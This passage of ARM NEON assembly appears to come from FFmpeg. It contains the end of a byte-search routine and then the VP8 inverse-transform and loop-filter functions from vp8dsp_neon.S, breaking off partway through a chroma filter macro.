teq DAT0, #0
beq 90f
@ Check any remaining bytes
tst SIZE, #3
beq 13f
12: ldrb DAT0, [PTR], #1
sub SIZE, SIZE, #1
teq DAT0, #0
beq 90f
tst SIZE, #3
bne 12b
@ No candidate found
13: sub RESULT, PTR, BUF
b 99f
60: @ Small buffer - simply check by looping over bytes
subs SIZE, SIZE, #1
bcc 99f
61: ldrb DAT0, [PTR], #1
subs SIZE, SIZE, #1
teq DAT0, #0
beq 90f
bcs 61b
@ No candidate found
sub RESULT, PTR, BUF
b 99f
90: @ Found a candidate at the preceding byte
sub RESULT, PTR, BUF
sub RESULT, RESULT, #1
b 99f
91: @ Found a candidate somewhere in the preceding 4 bytes
sub RESULT, PTR, BUF
sub RESULT, RESULT, #4
sub TMP0, DAT0, #0x20000
bics TMP0, TMP0, DAT0
itt pl
ldrbpl DAT0, [PTR, #-3]
addpl RESULT, RESULT, #2
bpl 92f
teq RESULT, #0
beq 98f @ don't look back a byte if found at first byte in buffer
ldrb DAT0, [PTR, #-5]
92: teq DAT0, #0
it eq
subeq RESULT, RESULT, #1
b 98f
93: @ Found a candidate somewhere in the preceding 16 bytes
sub RESULT, PTR, BUF
sub RESULT, RESULT, #16
teq TMP0, #0
beq 95f @ not in first 4 bytes
sub TMP0, DAT0, #0x20000
bics TMP0, TMP0, DAT0
itt pl
ldrbpl DAT0, [PTR, #-15]
addpl RESULT, RESULT, #2
bpl 94f
teq RESULT, #0
beq 98f @ don't look back a byte if found at first byte in buffer
ldrb DAT0, [PTR, #-17]
94: teq DAT0, #0
it eq
subeq RESULT, RESULT, #1
b 98f
95: add RESULT, RESULT, #4
teq TMP1, #0
beq 96f @ not in next 4 bytes
sub TMP1, DAT1, #0x20000
bics TMP1, TMP1, DAT1
itee mi
ldrbmi DAT0, [PTR, #-13]
ldrbpl DAT0, [PTR, #-11]
addpl RESULT, RESULT, #2
teq DAT0, #0
it eq
subeq RESULT, RESULT, #1
b 98f
96: add RESULT, RESULT, #4
teq TMP2, #0
beq 97f @ not in next 4 bytes
sub TMP2, DAT2, #0x20000
bics TMP2, TMP2, DAT2
itee mi
ldrbmi DAT0, [PTR, #-9]
ldrbpl DAT0, [PTR, #-7]
addpl RESULT, RESULT, #2
teq DAT0, #0
it eq
subeq RESULT, RESULT, #1
b 98f
97: add RESULT, RESULT, #4
sub TMP3, DAT3, #0x20000
bics TMP3, TMP3, DAT3
itee mi
ldrbmi DAT0, [PTR, #-5]
ldrbpl DAT0, [PTR, #-3]
addpl RESULT, RESULT, #2
teq DAT0, #0
it eq
subeq RESULT, RESULT, #1
@ drop through to 98f
98: setend le
99: pop {v1-v6,pc}
endfunc
@ Release the register aliases so they cannot leak into later code.
.unreq RESULT
.unreq BUF
.unreq SIZE
.unreq PATTERN
.unreq PTR
.unreq DAT0
.unreq DAT1
.unreq DAT2
.unreq DAT3
.unreq TMP0
.unreq TMP1
.unreq TMP2
.unreq TMP3
|
Akagi201/ffmpeg-xcode
| 66,867
|
ffmpeg-3.0.2/libavcodec/arm/vp8dsp_neon.S
|
/*
* VP8 NEON optimisations
*
* Copyright (c) 2010 Rob Clark <rob@ti.com>
* Copyright (c) 2011 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
#include "neon.S"
@ void ff_vp8_luma_dc_wht(int16_t block[4][4][16], int16_t dc[16])
@ r0 = block, r1 = dc.  Inverse 4x4 Walsh-Hadamard transform of the
@ 16 luma DC coefficients; the dc buffer is zeroed as it is consumed.
@ Each output goes to element 0 of a 16-coefficient sub-block, hence
@ the 32-byte store stride in r3.
function ff_vp8_luma_dc_wht_neon, export=1
vld1.16 {q0-q1}, [r1,:128]
vmov.i16 q15, #0
@ First (row) pass of the WHT.
vadd.i16 d4, d0, d3
vadd.i16 d6, d1, d2
vst1.16 {q15}, [r1,:128]! @ clear dc[] as we go
vsub.i16 d7, d1, d2
vsub.i16 d5, d0, d3
vst1.16 {q15}, [r1,:128]
vadd.i16 q0, q2, q3
vsub.i16 q1, q2, q3
vmov.i16 q8, #3
vtrn.32 d0, d2
vtrn.32 d1, d3
vtrn.16 d0, d1
vtrn.16 d2, d3
vadd.i16 d0, d0, d16 @ + 3 for rounding of the final >> 3
@ Second (column) pass.
vadd.i16 d4, d0, d3
vadd.i16 d6, d1, d2
vsub.i16 d7, d1, d2
vsub.i16 d5, d0, d3
vadd.i16 q0, q2, q3
vsub.i16 q1, q2, q3
vshr.s16 q0, q0, #3
vshr.s16 q1, q1, #3
@ Scatter the 16 DCs, one per sub-block (stride 32 bytes).
mov r3, #32
vst1.16 {d0[0]}, [r0,:16], r3
vst1.16 {d1[0]}, [r0,:16], r3
vst1.16 {d2[0]}, [r0,:16], r3
vst1.16 {d3[0]}, [r0,:16], r3
vst1.16 {d0[1]}, [r0,:16], r3
vst1.16 {d1[1]}, [r0,:16], r3
vst1.16 {d2[1]}, [r0,:16], r3
vst1.16 {d3[1]}, [r0,:16], r3
vst1.16 {d0[2]}, [r0,:16], r3
vst1.16 {d1[2]}, [r0,:16], r3
vst1.16 {d2[2]}, [r0,:16], r3
vst1.16 {d3[2]}, [r0,:16], r3
vst1.16 {d0[3]}, [r0,:16], r3
vst1.16 {d1[3]}, [r0,:16], r3
vst1.16 {d2[3]}, [r0,:16], r3
vst1.16 {d3[3]}, [r0,:16], r3
bx lr
endfunc
@ void ff_vp8_idct_add(uint8_t *dst, int16_t block[16], ptrdiff_t stride)
@ r0 = dst, r1 = block (zeroed as it is consumed), r2 = stride.
@ Full 4x4 VP8 inverse DCT added to dst with unsigned saturation.
@ d4 holds the two transform constants: 20091 and 35468/2 — vqdmulh
@ doubles its result, compensating for the halved constant.
function ff_vp8_idct_add_neon, export=1
vld1.16 {q0-q1}, [r1,:128]
movw r3, #20091
movt r3, #35468/2
vdup.32 d4, r3
@ Row pass.
vmull.s16 q12, d1, d4[0]
vmull.s16 q13, d3, d4[0]
vqdmulh.s16 d20, d1, d4[1]
vqdmulh.s16 d23, d3, d4[1]
vshrn.s32 d21, q12, #16
vshrn.s32 d22, q13, #16
vadd.s16 d21, d21, d1
vadd.s16 d22, d22, d3
vadd.s16 d16, d0, d2
vsub.s16 d17, d0, d2
vadd.s16 d18, d21, d23
vsub.s16 d19, d20, d22
vadd.s16 q0, q8, q9
vsub.s16 q1, q8, q9
vtrn.32 d0, d3
vtrn.32 d1, d2
vtrn.16 d0, d1
vtrn.16 d3, d2
@ Column pass; block[] is cleared while the data is in registers.
vmov.i16 q15, #0
vmull.s16 q12, d1, d4[0]
vst1.16 {q15}, [r1,:128]!
vmull.s16 q13, d2, d4[0]
vst1.16 {q15}, [r1,:128]
vqdmulh.s16 d21, d1, d4[1]
vqdmulh.s16 d23, d2, d4[1]
vshrn.s32 d20, q12, #16
vshrn.s32 d22, q13, #16
vadd.i16 d20, d20, d1
vadd.i16 d22, d22, d2
vadd.i16 d16, d0, d3
vsub.i16 d17, d0, d3
vadd.i16 d18, d20, d23
vld1.32 {d20[]}, [r0,:32], r2
vsub.i16 d19, d21, d22
vld1.32 {d22[]}, [r0,:32], r2
vadd.s16 q0, q8, q9
vld1.32 {d23[]}, [r0,:32], r2
vsub.s16 q1, q8, q9
vld1.32 {d21[]}, [r0,:32], r2
vrshr.s16 q0, q0, #3
vtrn.32 q10, q11
vrshr.s16 q1, q1, #3
sub r0, r0, r2, lsl #2
vtrn.32 d0, d3
vtrn.32 d1, d2
vtrn.16 d0, d1
vtrn.16 d3, d2
@ Add residual to the four source rows, saturate, store.
vaddw.u8 q0, q0, d20
vaddw.u8 q1, q1, d21
vqmovun.s16 d0, q0
vqmovun.s16 d1, q1
vst1.32 {d0[0]}, [r0,:32], r2
vst1.32 {d0[1]}, [r0,:32], r2
vst1.32 {d1[1]}, [r0,:32], r2
vst1.32 {d1[0]}, [r0,:32], r2
bx lr
endfunc
@ void ff_vp8_idct_dc_add(uint8_t *dst, int16_t block[16], ptrdiff_t stride)
@ r0 = dst, r1 = block, r2 = stride.  DC-only 4x4 inverse transform:
@ adds (dc + 4) >> 3 (vrshr) to every pixel of the 4x4 destination
@ block with unsigned saturation, clearing the stored DC coefficient.
function ff_vp8_idct_dc_add_neon, export=1
mov r3, #0
ldrsh r12, [r1]
strh r3, [r1] @ clear the consumed DC
vdup.16 q1, r12
vrshr.s16 q1, q1, #3 @ rounded dc >> 3
vld1.32 {d0[]}, [r0,:32], r2
vld1.32 {d1[]}, [r0,:32], r2
vld1.32 {d0[1]}, [r0,:32], r2
vld1.32 {d1[1]}, [r0,:32], r2
vaddw.u8 q2, q1, d0
vaddw.u8 q3, q1, d1
sub r0, r0, r2, lsl #2
vqmovun.s16 d0, q2
vqmovun.s16 d1, q3
vst1.32 {d0[0]}, [r0,:32], r2
vst1.32 {d1[0]}, [r0,:32], r2
vst1.32 {d0[1]}, [r0,:32], r2
vst1.32 {d1[1]}, [r0,:32], r2
bx lr
endfunc
@ void ff_vp8_idct_dc_add4uv(uint8_t *dst, int16_t block[4][16],
@                            ptrdiff_t stride)
@ r0 = dst, r1 = blocks, r2 = stride.  Four DC-only 4x4 inverse
@ transforms over a chroma 8x8 area (two 4x4 blocks side by side in
@ each 8-byte row): DCs are gathered (32-byte stride, cleared as
@ read), rounded >> 3, then added row-wise with unsigned saturation.
@ q8 covers the top pair of blocks, q9 the bottom pair.
function ff_vp8_idct_dc_add4uv_neon, export=1
vmov.i16 d0, #0
mov r3, #32
vld1.16 {d16[]}, [r1,:16]
vst1.16 {d0[0]}, [r1,:16], r3
vld1.16 {d17[]}, [r1,:16]
vst1.16 {d0[0]}, [r1,:16], r3
vld1.16 {d18[]}, [r1,:16]
vst1.16 {d0[0]}, [r1,:16], r3
vld1.16 {d19[]}, [r1,:16]
vst1.16 {d0[0]}, [r1,:16], r3
mov r3, r0
vrshr.s16 q8, q8, #3 @ dc >>= 3
vld1.8 {d0}, [r0,:64], r2
vrshr.s16 q9, q9, #3
vld1.8 {d1}, [r0,:64], r2
vaddw.u8 q10, q8, d0
vld1.8 {d2}, [r0,:64], r2
vaddw.u8 q0, q8, d1
vld1.8 {d3}, [r0,:64], r2
vaddw.u8 q11, q8, d2
vld1.8 {d4}, [r0,:64], r2
vaddw.u8 q1, q8, d3
vld1.8 {d5}, [r0,:64], r2
vaddw.u8 q12, q9, d4
vld1.8 {d6}, [r0,:64], r2
vaddw.u8 q2, q9, d5
vld1.8 {d7}, [r0,:64], r2
vaddw.u8 q13, q9, d6
vqmovun.s16 d20, q10
vaddw.u8 q3, q9, d7
vqmovun.s16 d21, q0
vqmovun.s16 d22, q11
vst1.8 {d20}, [r3,:64], r2
vqmovun.s16 d23, q1
vst1.8 {d21}, [r3,:64], r2
vqmovun.s16 d24, q12
vst1.8 {d22}, [r3,:64], r2
vqmovun.s16 d25, q2
vst1.8 {d23}, [r3,:64], r2
vqmovun.s16 d26, q13
vst1.8 {d24}, [r3,:64], r2
vqmovun.s16 d27, q3
vst1.8 {d25}, [r3,:64], r2
vst1.8 {d26}, [r3,:64], r2
vst1.8 {d27}, [r3,:64], r2
bx lr
endfunc
@ void ff_vp8_idct_dc_add4y(uint8_t *dst, int16_t block[4][16],
@                           ptrdiff_t stride)
@ r0 = dst, r1 = blocks, r2 = stride.  Four DC-only 4x4 inverse
@ transforms laid out side by side across a 16-byte luma row: DCs are
@ gathered (32-byte stride, cleared as read), rounded >> 3, and added
@ to four 16-pixel rows with unsigned saturation.  q8 supplies the
@ left half of each row, q9 the right half.
function ff_vp8_idct_dc_add4y_neon, export=1
vmov.i16 d0, #0
mov r3, #32
vld1.16 {d16[]}, [r1,:16]
vst1.16 {d0[0]}, [r1,:16], r3
vld1.16 {d17[]}, [r1,:16]
vst1.16 {d0[0]}, [r1,:16], r3
vld1.16 {d18[]}, [r1,:16]
vst1.16 {d0[0]}, [r1,:16], r3
vld1.16 {d19[]}, [r1,:16]
vst1.16 {d0[0]}, [r1,:16], r3
vrshr.s16 q8, q8, #3 @ dc >>= 3
vld1.8 {q0}, [r0,:128], r2
vrshr.s16 q9, q9, #3
vld1.8 {q1}, [r0,:128], r2
vaddw.u8 q10, q8, d0
vld1.8 {q2}, [r0,:128], r2
vaddw.u8 q0, q9, d1
vld1.8 {q3}, [r0,:128], r2
vaddw.u8 q11, q8, d2
vaddw.u8 q1, q9, d3
vaddw.u8 q12, q8, d4
vaddw.u8 q2, q9, d5
vaddw.u8 q13, q8, d6
vaddw.u8 q3, q9, d7
sub r0, r0, r2, lsl #2
vqmovun.s16 d20, q10
vqmovun.s16 d21, q0
vqmovun.s16 d22, q11
vqmovun.s16 d23, q1
vqmovun.s16 d24, q12
vst1.8 {q10}, [r0,:128], r2
vqmovun.s16 d25, q2
vst1.8 {q11}, [r0,:128], r2
vqmovun.s16 d26, q13
vst1.8 {q12}, [r0,:128], r2
vqmovun.s16 d27, q3
vst1.8 {q13}, [r0,:128], r2
bx lr
endfunc
@ Register layout:
@ P3..Q3 -> q0..q7
@ flim_E -> q14
@ flim_I -> q15
@ hev_thresh -> r12
@
@ VP8 loop filter core, operating on 16 pixels per lane-column at a time.
@ Three variants selected by the macro arguments:
@   simple=1 : "simple" filter; only P1..Q1 (q2..q5) are read and only
@              P0/Q0 are modified; the edge test uses flim (q14) alone.
@   inner=1  : normal filter for inner (non-macroblock) edges; modifies
@              P1..Q1.
@   default  : macroblock-edge filter (filter_mbedge); modifies P2..Q2.
@ On exit the filtered pixels are left in place in q1..q6 (subset
@ depending on variant), converted back to unsigned.
.macro vp8_loop_filter, inner=0, simple=0
.if \simple
vabd.u8 q9, q3, q4 @ abs(P0-Q0)
vabd.u8 q15, q2, q5 @ abs(P1-Q1)
vqadd.u8 q9, q9, q9 @ abs(P0-Q0) * 2
vshr.u8 q10, q15, #1 @ abs(P1-Q1) / 2
vqadd.u8 q11, q9, q10 @ (abs(P0-Q0)*2) + (abs(P1-Q1)/2)
vmov.i8 q13, #0x80
vcle.u8 q8, q11, q14 @ (abs(P0-Q0)*2) + (abs(P1-Q1)/2) <= flim
.else
@ calculate hev and normal_limit:
vabd.u8 q12, q2, q3 @ abs(P1-P0)
vabd.u8 q13, q5, q4 @ abs(Q1-Q0)
vabd.u8 q10, q0, q1 @ abs(P3-P2)
vabd.u8 q11, q1, q2 @ abs(P2-P1)
vcle.u8 q8, q12, q15 @ abs(P1-P0) <= flim_I
vcle.u8 q9, q13, q15 @ abs(Q1-Q0) <= flim_I
vcle.u8 q10, q10, q15 @ abs(P3-P2) <= flim_I
vcle.u8 q11, q11, q15 @ abs(P2-P1) <= flim_I
vand q8, q8, q9
vabd.u8 q9, q7, q6 @ abs(Q3-Q2)
vand q8, q8, q11
vabd.u8 q11, q6, q5 @ abs(Q2-Q1)
vand q8, q8, q10
vcle.u8 q10, q9, q15 @ abs(Q3-Q2) <= flim_I
vcle.u8 q11, q11, q15 @ abs(Q2-Q1) <= flim_I
vabd.u8 q9, q3, q4 @ abs(P0-Q0)
vabd.u8 q15, q2, q5 @ abs(P1-Q1)
vand q8, q8, q10
vqadd.u8 q9, q9, q9 @ abs(P0-Q0) * 2
vand q8, q8, q11
vshr.u8 q10, q15, #1 @ abs(P1-Q1) / 2
vdup.8 q15, r12 @ hev_thresh
vqadd.u8 q11, q9, q10 @ (abs(P0-Q0)*2) + (abs(P1-Q1)/2)
vcgt.u8 q12, q12, q15 @ abs(P1-P0) > hev_thresh
vcle.u8 q11, q11, q14 @ (abs(P0-Q0)*2) + (abs(P1-Q1)/2) <= flim_E
vcgt.u8 q14, q13, q15 @ abs(Q1-Q0) > hev_thresh
vand q8, q8, q11
vmov.i8 q13, #0x80
vorr q9, q12, q14
.endif
@ at this point:
@ q8: normal_limit
@ q9: hev
@ convert to signed value:
veor q3, q3, q13 @ PS0 = P0 ^ 0x80
veor q4, q4, q13 @ QS0 = Q0 ^ 0x80
vmov.i16 q12, #3
vsubl.s8 q10, d8, d6 @ QS0 - PS0
vsubl.s8 q11, d9, d7 @ (widened to 16bit)
veor q2, q2, q13 @ PS1 = P1 ^ 0x80
veor q5, q5, q13 @ QS1 = Q1 ^ 0x80
vmul.i16 q10, q10, q12 @ w = 3 * (QS0 - PS0)
vmul.i16 q11, q11, q12
vqsub.s8 q12, q2, q5 @ clamp(PS1-QS1)
vmov.i8 q14, #4
vmov.i8 q15, #3
.if \inner
vand q12, q12, q9 @ if(hev) w += clamp(PS1-QS1)
.endif
vaddw.s8 q10, q10, d24 @ w += clamp(PS1-QS1)
vaddw.s8 q11, q11, d25
vqmovn.s16 d20, q10 @ narrow result back into q10
vqmovn.s16 d21, q11
.if !\inner && !\simple
veor q1, q1, q13 @ PS2 = P2 ^ 0x80
veor q6, q6, q13 @ QS2 = Q2 ^ 0x80
.endif
vand q10, q10, q8 @ w &= normal_limit
@ registers used at this point..
@ q0 -> P3 (don't corrupt)
@ q1-q6 -> PS2-QS2
@ q7 -> Q3 (don't corrupt)
@ q9 -> hev
@ q10 -> w
@ q13 -> #0x80
@ q14 -> #4
@ q15 -> #3
@ q8, q11, q12 -> unused
@ filter_common: is4tap==1
@ c1 = clamp(w + 4) >> 3;
@ c2 = clamp(w + 3) >> 3;
@ Q0 = s2u(QS0 - c1);
@ P0 = s2u(PS0 + c2);
.if \simple
vqadd.s8 q11, q10, q14 @ c1 = clamp((w&hev)+4)
vqadd.s8 q12, q10, q15 @ c2 = clamp((w&hev)+3)
vshr.s8 q11, q11, #3 @ c1 >>= 3
vshr.s8 q12, q12, #3 @ c2 >>= 3
vqsub.s8 q4, q4, q11 @ QS0 = clamp(QS0-c1)
vqadd.s8 q3, q3, q12 @ PS0 = clamp(PS0+c2)
veor q4, q4, q13 @ Q0 = QS0 ^ 0x80
veor q3, q3, q13 @ P0 = PS0 ^ 0x80
veor q5, q5, q13 @ Q1 = QS1 ^ 0x80
veor q2, q2, q13 @ P1 = PS1 ^ 0x80
.elseif \inner
@ the !is4tap case of filter_common, only used for inner blocks
@ c3 = ((c1&~hev) + 1) >> 1;
@ Q1 = s2u(QS1 - c3);
@ P1 = s2u(PS1 + c3);
vqadd.s8 q11, q10, q14 @ c1 = clamp((w&hev)+4)
vqadd.s8 q12, q10, q15 @ c2 = clamp((w&hev)+3)
vshr.s8 q11, q11, #3 @ c1 >>= 3
vshr.s8 q12, q12, #3 @ c2 >>= 3
vqsub.s8 q4, q4, q11 @ QS0 = clamp(QS0-c1)
vqadd.s8 q3, q3, q12 @ PS0 = clamp(PS0+c2)
vbic q11, q11, q9 @ c1 & ~hev
veor q4, q4, q13 @ Q0 = QS0 ^ 0x80
vrshr.s8 q11, q11, #1 @ c3 >>= 1
veor q3, q3, q13 @ P0 = PS0 ^ 0x80
vqsub.s8 q5, q5, q11 @ QS1 = clamp(QS1-c3)
vqadd.s8 q2, q2, q11 @ PS1 = clamp(PS1+c3)
veor q5, q5, q13 @ Q1 = QS1 ^ 0x80
veor q2, q2, q13 @ P1 = PS1 ^ 0x80
.else
vand q12, q10, q9 @ w & hev
vqadd.s8 q11, q12, q14 @ c1 = clamp((w&hev)+4)
vqadd.s8 q12, q12, q15 @ c2 = clamp((w&hev)+3)
vshr.s8 q11, q11, #3 @ c1 >>= 3
vshr.s8 q12, q12, #3 @ c2 >>= 3
vbic q10, q10, q9 @ w &= ~hev
vqsub.s8 q4, q4, q11 @ QS0 = clamp(QS0-c1)
vqadd.s8 q3, q3, q12 @ PS0 = clamp(PS0+c2)
@ filter_mbedge:
@ a = clamp((27*w + 63) >> 7);
@ Q0 = s2u(QS0 - a);
@ P0 = s2u(PS0 + a);
@ a = clamp((18*w + 63) >> 7);
@ Q1 = s2u(QS1 - a);
@ P1 = s2u(PS1 + a);
@ a = clamp((9*w + 63) >> 7);
@ Q2 = s2u(QS2 - a);
@ P2 = s2u(PS2 + a);
vmov.i16 q9, #63
vshll.s8 q14, d20, #3 @ 8*w (widened to 16 bit)
vshll.s8 q15, d21, #3
vaddw.s8 q14, q14, d20 @ 9*w
vaddw.s8 q15, q15, d21
vadd.s16 q8, q9, q14
vadd.s16 q9, q9, q15 @ 9*w + 63
vadd.s16 q11, q8, q14
vadd.s16 q12, q9, q15 @ 18*w + 63
vadd.s16 q14, q11, q14
vadd.s16 q15, q12, q15 @ 27*w + 63
vqshrn.s16 d16, q8, #7
vqshrn.s16 d17, q9, #7 @ clamp(( 9*w + 63)>>7)
vqshrn.s16 d22, q11, #7
vqshrn.s16 d23, q12, #7 @ clamp((18*w + 63)>>7)
vqshrn.s16 d28, q14, #7
vqshrn.s16 d29, q15, #7 @ clamp((27*w + 63)>>7)
vqadd.s8 q1, q1, q8 @ PS2 = clamp(PS2+a)
vqsub.s8 q6, q6, q8 @ QS2 = clamp(QS2-a)
vqadd.s8 q2, q2, q11 @ PS1 = clamp(PS1+a)
vqsub.s8 q5, q5, q11 @ QS1 = clamp(QS1-a)
vqadd.s8 q3, q3, q14 @ PS0 = clamp(PS0+a)
vqsub.s8 q4, q4, q14 @ QS0 = clamp(QS0-a)
veor q3, q3, q13 @ P0 = PS0 ^ 0x80
veor q4, q4, q13 @ Q0 = QS0 ^ 0x80
veor q2, q2, q13 @ P1 = PS1 ^ 0x80
veor q5, q5, q13 @ Q1 = QS1 ^ 0x80
veor q1, q1, q13 @ P2 = PS2 ^ 0x80
veor q6, q6, q13 @ Q2 = QS2 ^ 0x80
.endif
.endm
@ Vertical (horizontal-edge) loop filter across a 16-pixel-wide edge.
@ Args: r0 = dst (points at the row below the edge), r1 = stride,
@       r2 = flim_E, r3 = flim_I (unused when simple=1),
@       [sp+64 after vpush] = hev_thresh (non-simple only).
@ Loads P3..Q3 (or P1..Q1 for simple) rows straddling the edge, runs
@ vp8_loop_filter and stores the modified rows back.
.macro vp8_v_loop_filter16 name, inner=0, simple=0
function ff_vp8_v_loop_filter16\name\()_neon, export=1
vpush {q4-q7}
sub r0, r0, r1, lsl #1+!\simple @ back up 4 rows (2 for simple)
@ Load pixels:
.if !\simple
ldr r12, [sp, #64] @ hev_thresh
vld1.8 {q0}, [r0,:128], r1 @ P3
vld1.8 {q1}, [r0,:128], r1 @ P2
.endif
vld1.8 {q2}, [r0,:128], r1 @ P1
vld1.8 {q3}, [r0,:128], r1 @ P0
vld1.8 {q4}, [r0,:128], r1 @ Q0
vld1.8 {q5}, [r0,:128], r1 @ Q1
.if !\simple
vld1.8 {q6}, [r0,:128], r1 @ Q2
vld1.8 {q7}, [r0,:128] @ Q3
vdup.8 q15, r3 @ flim_I
.endif
vdup.8 q14, r2 @ flim_E
vp8_loop_filter inner=\inner, simple=\simple
@ back up to P2: dst -= stride * 6
sub r0, r0, r1, lsl #2
.if !\simple
sub r0, r0, r1, lsl #1
@ Store pixels:
vst1.8 {q1}, [r0,:128], r1 @ P2
.endif
vst1.8 {q2}, [r0,:128], r1 @ P1
vst1.8 {q3}, [r0,:128], r1 @ P0
vst1.8 {q4}, [r0,:128], r1 @ Q0
vst1.8 {q5}, [r0,:128], r1 @ Q1
.if !\simple
vst1.8 {q6}, [r0,:128] @ Q2
.endif
vpop {q4-q7}
bx lr
endfunc
.endm
@ Instantiate the three vertical 16-wide filter variants.
vp8_v_loop_filter16
vp8_v_loop_filter16 _inner, inner=1
vp8_v_loop_filter16 _simple, simple=1
@ Vertical loop filter for the two 8-pixel-wide chroma planes at once:
@ U rows go into the low d register of each q, V rows into the high one.
@ Args: r0 = u, r1 = v, r2 = stride, r3 = flim_E,
@       [sp+64] = flim_I, [sp+68] = hev_thresh (offsets after vpush).
.macro vp8_v_loop_filter8uv name, inner=0
function ff_vp8_v_loop_filter8uv\name\()_neon, export=1
vpush {q4-q7}
sub r0, r0, r2, lsl #2 @ back up 4 rows in u
sub r1, r1, r2, lsl #2 @ back up 4 rows in v
ldr r12, [sp, #64] @ flim_I
@ Load pixels:
vld1.8 {d0}, [r0,:64], r2 @ P3
vld1.8 {d1}, [r1,:64], r2 @ P3
vld1.8 {d2}, [r0,:64], r2 @ P2
vld1.8 {d3}, [r1,:64], r2 @ P2
vld1.8 {d4}, [r0,:64], r2 @ P1
vld1.8 {d5}, [r1,:64], r2 @ P1
vld1.8 {d6}, [r0,:64], r2 @ P0
vld1.8 {d7}, [r1,:64], r2 @ P0
vld1.8 {d8}, [r0,:64], r2 @ Q0
vld1.8 {d9}, [r1,:64], r2 @ Q0
vld1.8 {d10}, [r0,:64], r2 @ Q1
vld1.8 {d11}, [r1,:64], r2 @ Q1
vld1.8 {d12}, [r0,:64], r2 @ Q2
vld1.8 {d13}, [r1,:64], r2 @ Q2
vld1.8 {d14}, [r0,:64] @ Q3
vld1.8 {d15}, [r1,:64] @ Q3
vdup.8 q14, r3 @ flim_E
vdup.8 q15, r12 @ flim_I
ldr r12, [sp, #68] @ hev_thresh
vp8_loop_filter inner=\inner
@ back up to P2: u,v -= stride * 6
sub r0, r0, r2, lsl #2
sub r1, r1, r2, lsl #2
sub r0, r0, r2, lsl #1
sub r1, r1, r2, lsl #1
@ Store pixels:
vst1.8 {d2}, [r0,:64], r2 @ P2
vst1.8 {d3}, [r1,:64], r2 @ P2
vst1.8 {d4}, [r0,:64], r2 @ P1
vst1.8 {d5}, [r1,:64], r2 @ P1
vst1.8 {d6}, [r0,:64], r2 @ P0
vst1.8 {d7}, [r1,:64], r2 @ P0
vst1.8 {d8}, [r0,:64], r2 @ Q0
vst1.8 {d9}, [r1,:64], r2 @ Q0
vst1.8 {d10}, [r0,:64], r2 @ Q1
vst1.8 {d11}, [r1,:64], r2 @ Q1
vst1.8 {d12}, [r0,:64] @ Q2
vst1.8 {d13}, [r1,:64] @ Q2
vpop {q4-q7}
bx lr
endfunc
.endm
@ Instantiate the chroma vertical filter variants.
vp8_v_loop_filter8uv
vp8_v_loop_filter8uv _inner, inner=1
@ Horizontal (vertical-edge) loop filter for a 16-row luma edge.
@ Args: r0 = dst (edge column), r1 = stride, r2 = flim_E, r3 = flim_I,
@       [sp+64] = hev_thresh (non-simple only).
@ Loads 16 rows of 8 pixels around the edge, transposes so columns
@ become register lanes, filters, transposes back and stores.
.macro vp8_h_loop_filter16 name, inner=0, simple=0
function ff_vp8_h_loop_filter16\name\()_neon, export=1
vpush {q4-q7}
sub r0, r0, #4 @ start 4 pixels left of the edge
.if !\simple
ldr r12, [sp, #64] @ hev_thresh
.endif
@ Load pixels:
vld1.8 {d0}, [r0], r1 @ load first 8-line src data
vld1.8 {d2}, [r0], r1
vld1.8 {d4}, [r0], r1
vld1.8 {d6}, [r0], r1
vld1.8 {d8}, [r0], r1
vld1.8 {d10}, [r0], r1
vld1.8 {d12}, [r0], r1
vld1.8 {d14}, [r0], r1
vld1.8 {d1}, [r0], r1 @ load second 8-line src data
vld1.8 {d3}, [r0], r1
vld1.8 {d5}, [r0], r1
vld1.8 {d7}, [r0], r1
vld1.8 {d9}, [r0], r1
vld1.8 {d11}, [r0], r1
vld1.8 {d13}, [r0], r1
vld1.8 {d15}, [r0], r1
transpose_8x8 q0, q1, q2, q3, q4, q5, q6, q7 @ rows -> P3..Q3
vdup.8 q14, r2 @ flim_E
.if !\simple
vdup.8 q15, r3 @ flim_I
.endif
vp8_loop_filter inner=\inner, simple=\simple
sub r0, r0, r1, lsl #4 @ backup 16 rows
transpose_8x8 q0, q1, q2, q3, q4, q5, q6, q7 @ back to row order
@ Store pixels:
vst1.8 {d0}, [r0], r1
vst1.8 {d2}, [r0], r1
vst1.8 {d4}, [r0], r1
vst1.8 {d6}, [r0], r1
vst1.8 {d8}, [r0], r1
vst1.8 {d10}, [r0], r1
vst1.8 {d12}, [r0], r1
vst1.8 {d14}, [r0], r1
vst1.8 {d1}, [r0], r1
vst1.8 {d3}, [r0], r1
vst1.8 {d5}, [r0], r1
vst1.8 {d7}, [r0], r1
vst1.8 {d9}, [r0], r1
vst1.8 {d11}, [r0], r1
vst1.8 {d13}, [r0], r1
vst1.8 {d15}, [r0]
vpop {q4-q7}
bx lr
endfunc
.endm
@ Instantiate the three horizontal 16-row filter variants.
vp8_h_loop_filter16
vp8_h_loop_filter16 _inner, inner=1
vp8_h_loop_filter16 _simple, simple=1
@ Horizontal (vertical-edge) loop filter for the two 8-row chroma
@ planes at once: U rows in the low d registers, V rows in the high.
@ Args: r0 = u, r1 = v, r2 = stride, r3 = flim_E,
@       [sp+64] = flim_I, [sp+68] = hev_thresh (offsets after vpush).
.macro vp8_h_loop_filter8uv name, inner=0
function ff_vp8_h_loop_filter8uv\name\()_neon, export=1
vpush {q4-q7}
sub r0, r0, #4 @ start 4 pixels left of the edge
sub r1, r1, #4
ldr r12, [sp, #64] @ flim_I
@ Load pixels:
vld1.8 {d0}, [r0], r2 @ load u
vld1.8 {d1}, [r1], r2 @ load v
vld1.8 {d2}, [r0], r2
vld1.8 {d3}, [r1], r2
vld1.8 {d4}, [r0], r2
vld1.8 {d5}, [r1], r2
vld1.8 {d6}, [r0], r2
vld1.8 {d7}, [r1], r2
vld1.8 {d8}, [r0], r2
vld1.8 {d9}, [r1], r2
vld1.8 {d10}, [r0], r2
vld1.8 {d11}, [r1], r2
vld1.8 {d12}, [r0], r2
vld1.8 {d13}, [r1], r2
vld1.8 {d14}, [r0], r2
vld1.8 {d15}, [r1], r2
